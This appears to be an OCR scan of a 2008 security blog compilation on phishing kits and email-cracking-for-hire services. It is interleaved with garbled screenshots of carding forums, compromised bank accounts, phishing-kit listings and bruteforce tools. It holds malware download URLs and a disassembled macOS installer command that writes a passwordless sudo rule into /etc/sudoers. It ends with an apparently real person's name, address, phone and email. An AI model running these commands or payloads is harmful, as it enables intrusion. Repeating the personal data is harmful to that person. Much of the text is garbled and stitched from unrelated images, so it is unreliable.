a meee 996.255 4 Oo not eplcad same tools that you agded in other 
$ Kooogr £66.00 + Do not epload toots A tutors which has been shared 
in forums. 
6 MATCH M476 258 6 Recheck your teots , if your Quamty: is low your panet 
7 sacyy 2421615 2 Coenen ~ 
Detore yOu UpHORG - Maer CPanel snen sms 
s Oaengutasies 1807 00S othermete your 2ccourt mull be sutpesded ! 
$ Unemectoar 1269 655 © Oo mot euphcase toois! 
a) GePatacc 1444965 
Credit Cards Terms ! 
1 Oe not wpload prepaid cree cores! 
2 Ob Mat Comptain aBout refunded Cards we have Ou 
private checkers. 


1 What happens to your account # you are 
banees? 


2 i your account ts Banned for example Taxys 
Your tools will be availiable in sale, ( your 
eorrengs wel S109 at The Say you Got DaNneD | 
Your earnings wilt be reset at the ime when you 
Qt banned. 

3 i you repeat Breaking rules your account wit be 
Temoved permanenty 3nd earrangs mill reset to 
O.008! 


’ 4 . teow 
Clete Geet Ones € Pale © Carlee Gree (ODOR Oar Howe Cee! NODRECE TOD CRAs C Amy ae. rniem @ coeryy Tee me Sed BORDOOEE Comin FO RO WRNEA BLETLS HP CETEY =e AxiGeet HONDOCN (NAY Otero ORT COpere 
DORMS Ny SUR C COM MEVNDLHDOCe COTPyLar4eTe CTLe MOSM! BECe GED MEDERIRIEMD o MrEmn MANDATE CHRCHDO OD CneCe KONMIEE Copied ECE bend CLONIND © Nyeuew Inne 
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Send Alert To Notify Me When 
7 PrimaryEmed A hold has been placed on my account 
a} Tet (Note: You may also receive a hold notice with additional information regarding the hold by mail.) 
= a a Ca 

4 hold has been removed from my account 
r mt rece eee terete eee rete eee eee ee eee rs 
<< mane Seacesuress ietreseeete ietivancud waibotoestan soe : a 
Sc gS a a eels 
Fen ee cccesesesnensee Mt Panfee nas been added to my onine ba payment AO 
> PrimaryEmed 

An ATM deposi has posted to this account 
oi tet RARER EERE EERE EERE E EEE EE ERE EEE REAR EEE EE EERE EEE E EERE EERE REED 
T Primery€med 
r ext An overdraft protection advance was made to this accourt 
Frat nna Blt Sehetded okie repecting payment series hes ended 
7 PrimaryEmed 

Check | has posted 
r ket ee EE OE EEE EEE EERE EEE EE EEE EE EERE EERE EE EEE EE EEE EE EEE EEE RE EERE EERE Eee 
7 Primeryémed 
Dr ket Funds previously deposited to your account have been returned 
Trimaran, isttve® bank business days pir tothe payment date of en upcoming scheduled ba payment ——. 
7 Primary€redt My balance is above ($ USD) | for this account 
[kat ben sober alpaca tanita absnd 2 A ED 
r 
CO tet Your check or payment may not be completed because there's not enough money in your account 


Update Alerts Cancel 
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0000 BunaiH 3G 20:33 4 37%@_+ 
Chats [Pa6otaen] Taxcu... % 


last seen just now 


20:26 
Cnacu60 20:26. yv 


3BOHUTb HYKHO BOAUTENI0??? 
20:27 7 


fla, Kak 6yeT HefaNneKo OT 
Bac, A HAaNMUWY VU MO>*KeTe C HUM 
CO3BOHMTbCA TO 6bI HaiTV 


apyr apyra 20:27 
Cnacu60 20:28.\7 


Bogutenb Kakonu To fypak 

OKa3asica, B3AN 3aKa3 u yexan 
B O6paTHyW0 CTOpoHy, cenyac 
3akaxKy CHOBa 20:30 


XOPOWO 20-307 


K cooKaneHuto npomo no 500 
KOHYUMSINCb, CMO>KeTe 70p 
gonnatutb? 20:33 
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lat 14 tt 5.98 K6 
uf 21 tet 50.05 Ks 
uf 555 tt 50.42 Ke 
ai 12345 tt 43.65 K6 
laf 55555 bet 9.03 K6 

How Recovery Files txt 3 Gant 
uf pass tt 109,42 K6 
uf pass! tt 4.46 K6 
ia’ pass7word tet 8.43 K6 

passi - txt 43.65 K6 
uf Gpasunua ct 1.16 M6 
i BuTana naponu bet 1,03 M6 

ana cwa tt 3.89 K6 
ia aoxyment (5) tet 31.81 K6 
aif NOrMHE txt 1.66 K6 
iu’ Hennox tt 55.60 K6 
|’ HeNNoxo txt 608,14 Ks 
a’ Hopi TeKCTOBHIA AOKYMeHT (2) txt 873.78 K6 
if Hopes TeKCTOBLIA AOKYyMeHT (3) bet 263.32 K6 

Hosuit TeKcTOBHA DOKYyMeHT (6) bet 294.10 K6 
a’ Hopi TeKcTOBHIA AOKYMeHT (12) bet 7.82 K6 
af Hoswiti TexcTosEitd AOoKYyMeHT 000 bet 330.49 K6 
uf Hopi TeKCTOBEIA ROKYMeHT6) txt 20.94 K6 
uf HOBbe txt 215.32 K6 
ef Ocpuren bet 939.13 K6 

naponu bet 746.19 K6 
af NACCH C DEDA1 bet 1,03 M6 
\a/ npoKcu tt 1.43 K6 
uf poccua tt 83.66 K6 

c6opKa bet 11.17 K6 
uf Ton bet 500 6ait 
|! anonual tt 876.39 K6 
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Add Account © Help with this page 


—L— 
Account Information Verity Confirmation 


Add an external (non-Chase) account — complete the required fields below 
and click"Next." You may add external {(non-Chase) accounts to your online profile as long as: 


1. You own the account 


2. The accountis a U.S. bank account 
3. We can verify the account information you've provided 


*«Required field 
Add Account - Step 1 of 3 


YOUR BANK 
MEMO 
WR23R56 789K 


OL234S67690%" . L602 


Routing number? 2 Account number*@ 
[ost 120000 [45074701 326393808 
Bank name*x synovus 


Account type © Checking © Savings 


Account nickname* B [checking 


Is this a personal or business account?* © personal © Business 
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17862 


% of (% oT) 


a 


old in new (npeoSpazoeanne) 
Site:(Mowcx Tonexo Ha Came) 


link:(ccuinka) 


#...@(NOWKK B veTepeane) 


info: (sanpoc vexbopmaisa: o crparnaaye) 
related: (noxosme cTparwnum) 

cache: (npocmoTp coxpareHybix CTpaHiu) 
filetype:(¢ yxasanem KorepeTHoro Bey TOS 
aiinos) 


allintitle: (vuseT Cnowa 8 saronoexax CTpanwt) 


inurl:(movcx Caitros ¢ yrazareem Cn0fom 8 
anpece) 


Site:.edu (movcx Mo Qomeny/Mognomeny) 
site:country code (restrict search to country) 


intext:(nowcx caitros ¢ yKazaHeim TeKCTOM 8 
COnepxarant) 


allintext: (nowcx caiiros ¢ “acre ynomeHaHem 
yeasanHoro TexcTa 8 Copepmaniat) 


book(texct icxomolt av) 
bphonebook: (Homep Tenedoxa) 
weather:(mecto) 


Peaynetat 

Bce, uTo cogepser nokia « phone 

Bce, 4TO CORepAarT COBO pacnpogama nnn CMe notebook 

Bce, 4TO COmepMarT CnOBOCONeTaMINe KOMeHUATOIA Ban 

Copepxauee Cnoeo npexTep printer Ges cnosa cartridge 

Bee cceiteat, CORepMaUBe HAIBaKMe MyM>intema Toy Story 2 

BCe CChireat C YNOMIMaHIIEM CNOBA MALUNEHA HRT ETO CHMOMMMOS 

Bce cBeneHa CO CnOBOM MOWma (8 TOM wHCne  peKa) 

BouQact CChimot Ka KBAPTMpPb! M KOMMATI C ynomimaimem CnoeaMocKBa 
Cromenme. Ha sanpoc 9784456, seymact oTeet 978 + 456 = 1434 


Beranranme. Ha sanpoc 978-456, seact 978 — 456 = 522, Ho, Kpome 3TOrO Bei NOMyunTe ewe 
CCeaat HA BCR QOKYMENTRI, Conepxause 978-456 


Yeromenne. Ha sanpoc 978°456, semact 978 * 456 = 445968 


Denene. Ha 2anpoc 978/456, semact 978 / 456 = 2.14473684, Ho, xpome Toro eure 1 ynomimanne 
BMecTe 3THx Lundp. 


Npouert. Ha sanpoc 50% of 200 hz (unm 50% oF 200 hz) , eejact 50% of (200 hertz) = 100 
hertz (50 % or (200 fy) = 100 Fepu) 


Bospegenne 8 Cremer. Ha 3anpoc 4°18, sejact 4“18 = 68719476736 
45 celsius in Fahrenheit (45 yenvcua 8 dapenreire) aset4S rpagycos Wenscua = 113 
@apenreitta 


rpaaycos 
Zanpoc: site:mts.ru «SMS n MMS-MAXI» soigact 8ce, UTO ECTS No HTOMy TapHNby BO BCeX pernonax 


3TOT OMepaTOp MOSBOMAET YEIMETS BCE CTPaMMURi, KOTOPBIE CCRINaIOTCA Ha CTpaMiy, NO KOTOPOR 
Renan 3anpoc. 


Hanpeosep: eCTKH ANCK BHeUNM S00 py6...5000 pyGenaact Bam BCe BapHaxTe: MO WeHe OT S00 
0 5000 py6neit 


Nipwmep: info:www.facebook.com faeT Cchimy Ha CTpanetuy vexDopMaen © CeTH eDercbyxe 
Npwmep: related: www.facebook.com fact CC! Ha PaaTreIe COUMAMRMRNE CeTH 
BeyjaeT Coxparerneie 8 Kewe Google CTpatiap: CaiiTos 


Nipwmep: xponnan filetype:ppt aaet cchimxy Ka Mperertatent Power Point wa Temy «xpomeat= 
Npewmep: allintitie: »nike» Ger - ace po Ger ¢ Conepxarwem Cnosa «nike» 8 saronceKe 
inurl:duma seaaet ace Caiite, rae 8 aapece yxasavo: duma 


Site:.edu, site:.gov, site:.gov.ru,“ Tax Aanee 

site:.br «rio de Janeiro» 

Npwep: intext:cexpeTHo 

allintext:cexpetio - ynotpeGneHe 3Toro NapameTpa BbiaBan0 CKaxgan B 2010 rogy. MosBonAno 
HAXODHTS AOKYMEHTE: C 3TH fpexbom Ha Caitre Dymei PO um Apyncx pecypcos. 

book The Lord of the Rings 


bphonebook:Homep nomomer Halt CaiiT C yKazaHHEIm HOMEpOM 
weather:Mocxsa 8ey43¢T Norogy 8 Mocxze 


ty militarybankonline.b..> O6-Apr-2008 05:54 i16k 


online.anz.com.au.zip 06-Apr-2008 06:33 46k cd Parent Directory 09-Apr-2008 07:02 - 
online. wamu.com.zip 06-Apr-2008 06:51 8k a) MB-LETTER. HTM 06-Apr-2008 08:34 8k 
online.westpac.com.a..> 06-Apr-2008 06:42 37k Cy) Smile. html 06-Apr-2008 08:26 2k 
uuw. bankofamerica.co..> 06-Apr-2008 06:56 4ik =) St.George. htm 06-Apr-2008 06:27 3k 
uy. cahoot.com. zip 06-Apr-2008 06:35 85k OG abbey. html 06-Apr-2008 06:23 2k 
i uvy.chase.com.zip 06-Apr-2008 05:57 77k ") bank of america 2.htm 06-Apr-2008 06:23 7k 
uvy.e-gold.com.zip 06-Apr-2008 05:58 66k (a) bank of america.html 06-Apr-2008 08:23 4k 
uvy.e-trade.com. zip 06-Apr-2008 05:59 126k (s) e-gold. hemi 06-Apr-2008 06:25 2k 
i wy. ebay.com. zip 06-Apr-2008 05:58 86k ®) ebay 2.htm 06-Apr-2008 06:23 8k 
th uyy.epassporte.cow.tip O6-Apr-2008 05:56 301k G ebay 3.htm 06-Apr-2006 06:24 16k 
ty wyw.hsbc.co.uk.zip 06-Apr-2008 06:00 348k G ebay. html 06-Apr-2008 O6:23 10k 
i wvv.lloydstsb.com.zip 06-Apr-2008 06:00 45k =) etrade. html 06-Apr-2008 06:25 ik 
ty uvy.moneybookers.com..> O6-Apr-2008 06:01 331k =) halifax 2.htm 06-Apr-2008 06:25 3k 
ty wv. nationwide, si 06-Apr-2008 06:34 13k ®) halifax .html 06-Apr-2008 06:25 6k 
th wy. natvest.com.zip 06-Apr-2008 06:48 18k G hotmail. html 06-Apr-2006 06:25 6k 
i uvy.paypal.com ( 200..> O?-Apr-2008 15:43 388k ) habe . html 06-Apr-2006 06:26 Sk 
i wy. paypal.com. zip 06-Apr-2008 06:01 212k Cy) lioyds. html 06-Apr-2008 08:26 2k 
rh uvyv.sunnbn).com. zip 06-Apr-2008 06:02 256k ©) nationvide. html 06-Apr-2008 06:26 3k 
i wvy.tdcanadatrust.zip 06-Apr-2008 06:36 25k Ci) natwvest .htrel 06-Apr-2008 06:26 2k 
th uyy, usbank.com. zip 06-Apr-2008 06:04 98k G paypal 2. html 06-Apr-2008 06:26 8k 
th uuy. vachovia.com. zip 06-Apr-2008 06:05 73k C) paypal. htm. 06-Apr-2006 06:26 7k 
i uyy.wellsfargo.com.zip O6-Apr-2008 06:45 180k O) regions. html 06-Apr-2008 08:26 4k 
ty uvy, vesternunion.com.,.> O6-Apr-2008 06:06 ilik &) we listfargo.html 06-Apr-2008 06:27 8k 


There seems to be no such thing as a free phishing page these days, with phishers scamming 
one another at an alarming rate according to a recently published research entitled "[1]There 
is No Free Phish:An Analysis of “Free” and Live Phishing Kits". 


Cybercriminals attempting to scam other cybercriminals has been happening for years, 
with old school cases where backdoored malware tools such as crypters and binders are 
offered for free, or a newly released RAT whose client is in fact infected with a third-party 
malware. Realizing and definitely not enjoying the fact that the lowered entry barriers into 
cybercrime are empowering yesterday’s script kiddies will malware kits that used to be 
utilized by a set of people who invested time and money into the process several years ago, 
this unethical competitive practice is only going to get more common. Backdooring phishing 
pages is one thing, [2]backdooring entire web malware exploitation kits, next to the possibility 
to remotely exploit a competitor’s command and control server is entirely another : 


"Taking a more strategic approach, a cybercriminal wanting to scam another cybercrimi- 
nal would backdoor [3]a highly expensive web malware exploitation kit, then start distributing 
it for free, and in fact, there have been numerous cases when such kits have been distributed 
in such a fraudulent manner. The result is a total outsourcing of the process of coming up 
with ways to infect hundreds of thousands of users though client side exploits [4Jembedded or 
SQL injected at legitimate sites, and basically collecting the final output - the stolen E-banking 
data and the botnet itself." 


What’s to come in the long term? Why just backdoor the phishing page, when you can 
embedd it with a live exploit URL in an attempt to both, infect the cybercriminal about to use 
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Transfer Money 
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a - ) 
MAKCUMANIbHOE CXOAICTBO C <x ) 
PEAJIbHbIM MOsIb3OBATE/IEM 


Ne \C lee 
| ( AIRSOCKS 


MOBILE PROXIES 3G/4G/LTE 


Moctynupie onepatoppi: 
‘\ 
Poccus 
rE Megafon Beeline @ MTS 
* Yota Tele2/R1 
\ 
\ 


YepanHa @& ae 


BputaHua ae 
s'e Kyivste Three 
= i AIRSOCKS 


le £ 
6) Vodafone MOBLIE PROXIES 3G/4G/LTE 


Backconnect npoxcu 


KnvextcKui sanpoc KnmentcKuis sanpoc 


7 
Boi6op |P-appeca 
Ha KNUeHTCKUM 
3anpoc 


Ero nepenaya 8 o6pa6orKy 


npoKcu 


1 
1 
1 
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/ 
, uenesomy cepsucy 
! 
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cepBuc 
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Nepenaua orseta oT NonyyeHue orseta OT 
npoKcuv K MporpaMMHOMy uenesoro CepBuca K NpoKcu 
o6ecneyeHuio KnveHTa 


17868 


HOBAH YCIITYTA 


YJIbTV KAMAL 


| O/EPYK KY/ \ 
SATECTOMIN SR KK 


Cetb [lpuBatHbix LataLleHtpos 


“TO BYZET DAJIbLUE? 


ARVRSORKS 
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Knaccuyeckuit npoxcu 


KnventcKuik sanpoc KnmentcKui sanpoc 


Ero nepenaya 8 o6pa6orTKky 
npokcu 


Ero nepenaya OT NpoOKCU K 
uenesomy cepsucy 


Oguu nocrosHHbin 
BHeEWHU IP Ha 
Kaxkgbi 3anpoc 


Lleneson 
cepsBuc 


Orser cepsuca _,Orser cepsuca 

< 
Nepegaya orseta oT NonyyeHue orseta oT 
nNpoKcu K MpOorpaMMHOMy uenesoro Cepsuca K NpoKcu 
o6ecneveHulo KNMeHTAa 


Site: http: //qamejolt. com/auth/loagin#| 
B Stat} (Abort) Switch Sit 
Progress: 


Settings 


imeout [s}: 20 Bot relaunch delay [s}: 0 1) Resolve Hostname 


Combo Settings 
[M]<USER>:<PASS> filter: Apply same rules for <USER> and <PASS> 


Minimum Length: & Maximum Length: 8 
Letters Digits Alphanumeric Email 
Forbidden Chars: Allowed Chars: 


Lowercase and Uppercase etter and Digit Special Character 


| ]<EMAIL> filter; Must Be Email 


Load Settings from Snap Shot 
Save Settings to Snap Shot 
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OTMeHa [TOTOBO 


HosBoe orto unu Bugeo 


BuyLink Linkbilding For USA/RU/UA 


https://buylink.pro 


CMeHUTb HOMep +380 99 607 7/059 


Uma nonbsoBaTena @infoBuyLink 
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Wells Fargo Online ® 


Accounts | Bill Pay Transfers | Brokerage | Account Services | Messages & Alerts 
| Between Your Accounts | To Another Customer | To Another Country 


Transfer Money & Make Payments 


[7] Help 


ing-wse* 


Try It! Add your non-We 
payments to your eligibley¥ 


From Account 
To Account Select Any | 


Completed transfers and payments can be found in Account Activity. 


From Account To Account Scheduling Amount Status Action 


CHECKING | CHECKING | OneTime —_ $25000.00 | Pending View 
XXXXXX1784 | XXXXXX5612_ Send Now 


and obtain all of the already stolen virtual assets has has already stolen, and also, [5]have a 
third-party maintain a blended attack campaign without even knowing it. 


Related posts: 

[6]Phishing Campaign Spreading Across Facebook 
[7]Phishing Pages for Every Bank are a Commodity 
[8]RBN’s Phishing Activities 

[9]lnside a Botnet’s Phishing Activities 

[10]Large Scale MySpace Phishing Attack 
[11]Update on the MySpace Phishing Campaign 
[12]MySpace Phishers Now Targeting Facebook 
[13]MySpace Hosting MySpace Phishing Profiles 
[14]DIY Phishing Kits 

[15]DIY Phishing Kit Goes 2.0 

[16]PayPal and Ebay Phishing Domains 
[17]Average Online Time for Phishing Sites 

[18]The Phishing Ecosystem 

[19]Assessing a Rock Phish Campaign 

[20]Taking Down Phishing Sites - A Business Model? 
[21]Take this Malicious Site Down - Processing Order.. 
[22]209 Host Locked 

[23]209.1 Host Locked 

[24]66.1 Host Locked 

[25]Confirm Your Gullibility 

[26]Phishers, Soammers and Malware Authors Clearly Consolidating 
[27]The Economics of Phishing 


. http: //www.usenix. org/event/woot08/tech/full_papers/cova/cova_htm1/ 
. http://blogs.zdnet .com/security/?p=1641 
. http: //blogs.zdnet.com/security/?p=1598 


http: //blogs.zdnet .com/security/?p=1122 


ttp://ddanchev. blogspot .com/2008/05/skype-phishing-pages-serving-exploits.htm 
. http: //ddanchev. blogspot .com/2008/06/phishing-campaign-spreading-across.htm 
http: //ddanchev. blogspot .com/2008/03/phishing-pages-for-every-bank-are.htm 


ttp://ddanchev. blogspot .com/2008/02/rbns-phishing-activities.htm 
ttp://ddanchev. blogspot .com/2008/02/inside-botnets-phishing-activities.htm 


O©OOMONAURWNEH 


http: //ddanchev.blogspot.com/2007/11/large-scale-myspace-phishing-attack.htm 


| hetp:/ /ddanchey. blogepot con/200T/14/lerge-scale-ayspace-phishing-attack. heal 
12, 
13, 


. http: //ddanchev.blogspot .com/2007/09/diy-phishing-kit-goes-20.htm 
16. http: //ddanchev . blogspot .com/2007/09/paypal-and- ebay-phishing- domains. htm 


. http: //ddanchev.blogspot .com/2007/07/average-online-time-for-phishing-sites.htm 


18. http: //ddanchev.blogspot .com/2007/02/phishing- ecosystem. htm 
19. http: //ddanchev. blogspot .com/2007/10/assessing-rock-phish-campaign.htm 


. http: //ddanchev. blogspot .com/2007/04/taking-down-phishing-sites-business.htm 


. http: //ddanchev. blogspot . com/2007/03/take-this-malicious-site-down.htm 


22. http://ddanchev. blogspot .com/2007/09/209-host-locked. htm 
23. http://ddanchev. blogspot .com/2007/12/2091-host-locked. htm 
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Haxowey- To 1OGparath KaNHCaTS OTIe@. ITO Gen mon NepeDd oTADa c Cepaomoe, NOOTORy Getd OVEre BOMarTem HO, HO NO NpPHNETy LOMOn NOremAmOD, “TO TOO He NOCMEQHeE 
HacTorexo xomneTermma mages 6 CBoém ene a Gamo He EcTPewana. Ma QpoTAmeres! BCeTO OTADIKa On NerTepecomaNnca BCeM, wee Mor NOMOM. OGuytrast Témmoe, ne Sayyeremane 
dpasaun ax o7o Gemaet 6 creme, 38 808 epenea OTIbO, K HEM He BOWORENO Hit OQHOTO BOMpoca A cust CVE BaEHO TO. “TO Ha Conn Geet 24 Ha 7, ante 9TO 4 MOBOREEO Het 0 “alte 
He Gecroxonthca MoaTOsy AMR MOHA yt OveRHQHO, ¢ mou A Byfy NPOBO ANTS Bce Noche A yous MyTeuec TBied)}))) ChacHBo TeSe Gormwoe, 34 To «TO Aaum Tax BOsDOC TDI! 
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ToTrosbie pewenua Komnumektyrouye 
AA ManwvHuUHra 


Acuk MaiiHeppt (Asic) 
MawtHurr depmpi GPU Mpoueccopsi, B4ZeoKapTbI 
MaTepuiHky, GrAOKM NuTaHuA, Avcku SSD 
KOHTposwiepphi, KaG6enu vu Apyroe. 
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= My Account Send Payment Request Payment Merchant Services Pp 


Overview Withdraw Hishe Q: 50303094 Profile 


Welcome, Harsh Agrawal Add/Edit Email 


Account Type: Premier | Status: Verified Sending and Withdraw A j nt 
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4.8.8 Email Hacking Going Commercial - Part Two (2008-08-08 19:25) 


Malware authors seeking financial gains from releasing their trojans often promote them 
as [1]Remote Access Tools, which if we exclude the built-in anti-sandboxing and antivirus 
software killing capabilities, [2]could pass for a RAT. In a similar deceptive fashion, [3]email 
hacking services are pitched as email password recovery services. 
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DO A HECK OF A JOB IN IT !! We cannot be as presentable as the other groups, trying to 
look as formal and corporate, as if they are running a Major Corporate Office. However they 
present it...oassword retrieval, online investigation.. access recovery...blah blah blah.. the 
most simplest way to put it is.. : Email Password Cracking: !! And since everyone else is busy 
faking it, or trying to be more presentable, we utilize our skills to get you what you want.. i.e. 
THE EMAIL PASSWORD. No buttering up, no marketing skills... plain hardcore hacking !! So, 
since you now know what we do , and want us to do the job for you, please proceed to the 
order page for your relevant TARGET EMAIL and submit your request. All said and done, we 
will get the elusive password & send you a couple of proofs. You decide upon the authenticity 
of the proofs, and let us know if you are comfortable going ahead with the payment. PAY US, 
AND YOU GET THE PASSWORD !And as they say....... " 


How much are they charging for the bruteforcing? $150 for starters, which is prone to 
increase due to their bla bla bla about how sophisticated it was to obtain the password - given 
they actually manage to deliver the goods : 
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"Many groups charge a fixed price for an email cracking. We undertake more kinds of projects 
than anyone else. Frankly, each email is a different project in itself. We cannot charge you 
$100, for something which we can do for $50. Subsequently, we cannot charge you $100, for 
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something which should be priced at $200. But we charge a minimum of $150 USD so that we 
end up taking orders from ONLY those who really need it. It is a small amount for the level of 
satisfaction, facts/truth and relief that you would ultimately achieve from this.It depends upon 
the nature of the job, the accessibility factor. and many other reasons likes:- 


1- The email service provider 

2- The target itself. How net-savvy he/she is. 

3- Complexity of the password 

4- Urgency of job and many other things collectively. 


We will let you know our charges once we have the desired results only. Be assured, 
we wont charge you the moon. We charge only what we deserve, and is acceptable by you. 
Trust us !!" 


Some of their answers to the frequently asked questions : 


"- Who are you? Where are you from? 

We are Hire2Hack Group. Member of our group are students in information technology, at 
some university in England, France, Italy, Japan, Australia, Canada, Brasilia and at United 
States of America. 


- What services do you provide? 
We can hack ANY EMAIL password for you very fast, reliable, secure and worldwide for a 
suitable price. 


- Can you really hack password or just a making a shit scam? 

Well, lot of people, lot of groups, companies do this service, but not guaranteed. This is only 
you can choose which group you want to Order. Be careful with these people. You can believe 
only on them who claims to provide proof before you really pay them. 


- Is there any tool available to crack password? 
Yes there is. And we are not giving it to you. 


- How long does it takes to crack a password? 

Each account is different and hacking time vary. On average, it might take about 1 to 3 days, 
but it may take anywhere from 24 hours to 30 days or more depending on how difficult is the 
hacking of each account. 


- How can I! believe you, that you got password? 
We will provide you some good proofs before requesting you to pay us. The proof can be 
anything, you can decide what kind proof you need. 


- ls there person will know that his/her email id has been cracked? 
No, we provide you only the original password. That mean the current active password. Your 
victim/target will not realized that she/he has been hacked. NEVER, we said ! 


- How I will pay you, I do not have credit card or I do not want to give my 
credit card number on net? 

Well, you can use international money transfer service such as Western Union 
(www.westernunion.com) or Money Gram (www.moneygram.com). These services imme- 
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127.0.0.1 


166.62 85.1614 :45741 


47,254,134. 144-8082 


Die[o] 


[) Detect ONS settings automatically 


Connections 


[V] Resolve hostnames through proxy 
=k Connections | wh Traffic | © statis [py THY to resolve via local ONS service frst 


(this option may cause significant delays if local ONS is unavailable!) 


Note 
eialmazaoata! ebsites 


Proxifier assigns “fake” IP addresses (127.8.*. nas raeis mae 
when it is running. 


ONS exdusion ist 
Do not resolve the following hostnames through proxy: 
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[D} lonlebitcy.cc/ex/taskm.exe 


(D) septi.gdie/rm.php 
(D) 185.118.167.198:8485/400.ex0 


[O) timmason2.com/dernoami/oknew/10.exe 


[0) timmason2?.com/derncami/newn/10.exe 
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Hato, (7A © Logo 
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93.179.68.2 


192.185.119.103 


192.185.119.103 


diate transfer money on same day or same hour. You can locate their agents in yours area 
from their website. 


- Do I have to give you my password? 
No. Any service which requires your password is simply trying to scam you out of access to 
your account. 


- How will Il know you really have the password? 
We will show you the proofs.. which are mostly convincing. 


- Since you have the password anyway, will you give it to me? 

NO. Do not waste your time or ours. We will not release the password until full payment is 
made - no exceptions. We have had people request our service and once we recover the 
password, they reset the subject account then ask us for the original password so they can 
reset it back - the answer will be no. We have also had people ask if they could have the 
password since we’ve already recovered it and they cannot pay - the answer will be no. No 
password will be released until payment has been made in full - no exceptions. 


- Will you recover more than one password? Can I! request more than one email 
account? 

Yes, but a separate request must be filled out for each one as you will only be billed for each 
successful recovery. If we have previously recovered a password for you and you have not 
paid, we will not begin any new request for you until your previous request is paid in full with 
exceptions for our established clientele. We charge at minimum US $100 for each account 
hacked. 


- Do you reset or change the current password? 

No. We do not try to guess the current password or the secret question’s answer, we do not 
change their password. We give you only the Original password, which the victim is currently 
using. 


- Is this confidential? Do you share my information with anyone else? 

No, Not at all, Not in any case, its a trust between you and us. Your information will be 
respected as long as you abide by our Terms and Conditions and Privacy policy. We keep 
your personal records and requests confidential in our database but we respect your right to 
privacy and will not rent, share, sell, or trade any personal information unless required by law. 
But, if you engage in any spamming or fraudulent actives, Your information will be 
given to the appropriate authorities." 


So you've got script kiddies cracking email addresses and probably engaging in the rest 
of the usual cybercrime activities, who are spam sensitive, and would expose their customers 
if they start spamming from the cracked emails? Now that’s socially responsible, isn’t it. 


Targeted attacks are sexy, but bruteforcing email accounts no matter the number of proxies 
and wordlists that they have access to is so irrelevant, that social engineering a potential 
victim into infecting herself with malware through a live exploit URL seems to be the method 
of choice, next to a plain simple phishing email of course. In this case, what they’re asking 
for in respect to the victim’s details is the victim’s country and victim’s language, so that a 
localized social engineering or phishing attack can take place. However, this particular group 
seems to be using a standard bruteforcing tool. 
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ond CQ 6644448 8 


Comptes de dépat Placements non Solde crésteur r+] 
De 
mane 
30 958,02 $ 2.000,00 $ 0,00$ now 
proc 
Afficher: Liste Otgrammnes Fonds disponibles e 
Comptes de dépdt - Vous manquez d'argent? Ajoutez le Service de Protection di 
découvert CIBC 
Compte de chéques * 368.255 
07029-84-26685 
| Compte d'épargne * 30692.77$ x 
O7029-84-26604 
Trander Savings » 0.00$ 
00319-73-40899 
Trander * 0,00$ 
00319-75-04284 
Placements non enregistrés - Mise 4 jour aux retevés de placement 
CPG * z 
00063-2456671 
Crédit - Remboursez vos deties au moyen d'un prit personne! 
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Comptes de déptt Placements non Solde créditeur 
enregsines 
30 958,02 $ 2 000,00 $ 0,00$ 
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One thing’s for sure - cybercrime is getting easier to outsource, and with potential cus- 
tomers starting to have access to services they didn’t a couple of years ago, [4]fake scammers 
are also emerging in between the real ones. 


1. http: //ddanchev. blogspot .com/2007/07/shark2-rat-or-malware .htm 
2. http: //ddanchev.blogspot .com/2007/08/rats-or-malware.htm 


. http://ddanchev.blogspot.com/2008/07/email-hacking-going- commercial .htm 
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Different audience provokes different approach for communicating a particular event. In 
case you aren’t reading [1]ZDNet’s Zero Day, where | blog next to Ryan Naraine and Nathan 
McFeters - join us. 


Also, consider subscribing yourself to [2]my personal RSS feed, or Zero Day’s main feed 
[3]in order to read all the posts. Here’s a quick summary of my posts for last month : 
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Lloc_10080c639: 
rax = [@"echo ‘echo \\\"$(whoami) ALL=(ALL) NOPASSWD:ALL\\\" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers 
newgrp; sudo -s /Volumes/SmartInstaller/. resources/VSInstaller.app/Contents/MacOS/VSInstaller —- 
agreetolicense && rm -rf /var/tmp/se10395.sh" writeToFile:@"/var/tmp/se10395.sh" atomically:0x@]; 
if (rax == @x@) { 
NSLog(@"Error writing se script"); 


rbx = *objc_msgSend; 

rax = (rbx)(*bind_OBJC_CLASS_$ NSTask, @selector(alloc)); 
rax = (rbx)(rax, *objc_sel_init); 

r14 = rax; 


(rbx)(r14, @selector(setLaunchPath:), @'/bin/bash"); 

rax = (rbx)(*bind__OBJC_CLASS_$ NSArray, @selector(arrayWithObjects:), @"/var/tmp/se10395.sh", @x@); 
(rbx)(r14, @selector(setArguments:), rax); 

(rbx)(r14, @selector(launch)); 

(rbx)(r14, @selector(autorelease)); 
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01. [4]Blizzard introducing two-factor authentication for WoW gamers 

02. [5]Sony PlayStation’s site SQL injected, redirecting to rogue security software 

03. [6]300 Lithuanian sites hacked by Russian hackers 

04. [7]Antivirus vendor introducing virtual keyboard for secure Ebanking 

05. [8]Gmail, Yahoo and Hotmail’s CAPTCHA broken by spammers 

06. [9]Storm Worm’s Independence Day campaign 

07. [10]Approximately 800 vulnerabilities discovered in antivirus products 

08. [11] $1 Million prize offered for cracking an encryption algorithm 

09. [12]U.K’s most spammed person receives 44,000 spam emails daily 

10. [13]Storm Worm says the U.S have invaded Iran 

11. [14]Gmail, PayPal and Ebay embrace DomainkKeys to fight phishing emails 

12. [15]Verizon, Telecom Italia, and Brasil Telecom top the botnet charts in Q2 of 2008 

13. [16]XSS worm at Justin.tv infects 2,525 profiles 

14. [17]Remote code execution through Intel CPU bugs 

15. [18]Ringleader of cybercrime group to be offered a job as cybercrime fighter 

16. [19]Spam coming from free email providers increasing 

17. [20]Kaspersky’s Malaysian site hacked by Turkish hacker 

18. [21]Georgia President’s web site under DDoS attack from Russian hackers 

19. [22]75 % of online banking sites found vulnerable to security design flaws 

20. [23]McAfee debunks recent vulnerabilities in AV software research, n.runs restates its 
position 

21. [24]Click fraud in 2nd quarter of 2008 more sophisticated, botnets to blame 

22. [25]How OpenDNS, PowerDNS and MaraDNS remained unaffected by the DNS cache 
poisoning vulnerability 

23. [26]DNS cache poisoning attacks exploited in the wild 

24. [27]The Neosploit cybercrime group abandons its web malware exploitation kit 

25. [28]OS fingerprinting Apple’s iPhone 2.0 software - a "trivial joke" 

26. [29]HD Moore pwned with his own DNS exploit, vulnerable AT &T DNS servers to blame 
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Huynh 

Kieu Thanh Truc 

Huynh Kieu Thanh Truc 
2211 LeesBorough Dr 
Silver Spring 

MD 

20902 

240-893-0060 
thanhtruc@gmail.com 


Delay: 30 4 miliseconds [¥] Clear Text [7] On/Off (F7) 


